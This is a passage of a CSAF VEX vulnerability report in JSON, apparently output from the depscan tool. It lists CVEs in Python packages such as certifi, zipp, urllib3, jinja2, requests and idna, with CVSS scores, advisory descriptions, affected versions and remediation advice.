"CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, {"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.  GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}, "result_14": {"common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion  The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.  The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.  ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.  From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):  > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.  ## Affected usages  Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.  Both of the following conditions must be true to be affected by this vulnerability:  * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.  ## Remediation  You can remediate this vulnerability with any of the following steps:  * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.   ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.  Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool.  ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation.  * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used.  ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.  ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7.  ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.  ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb  ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": 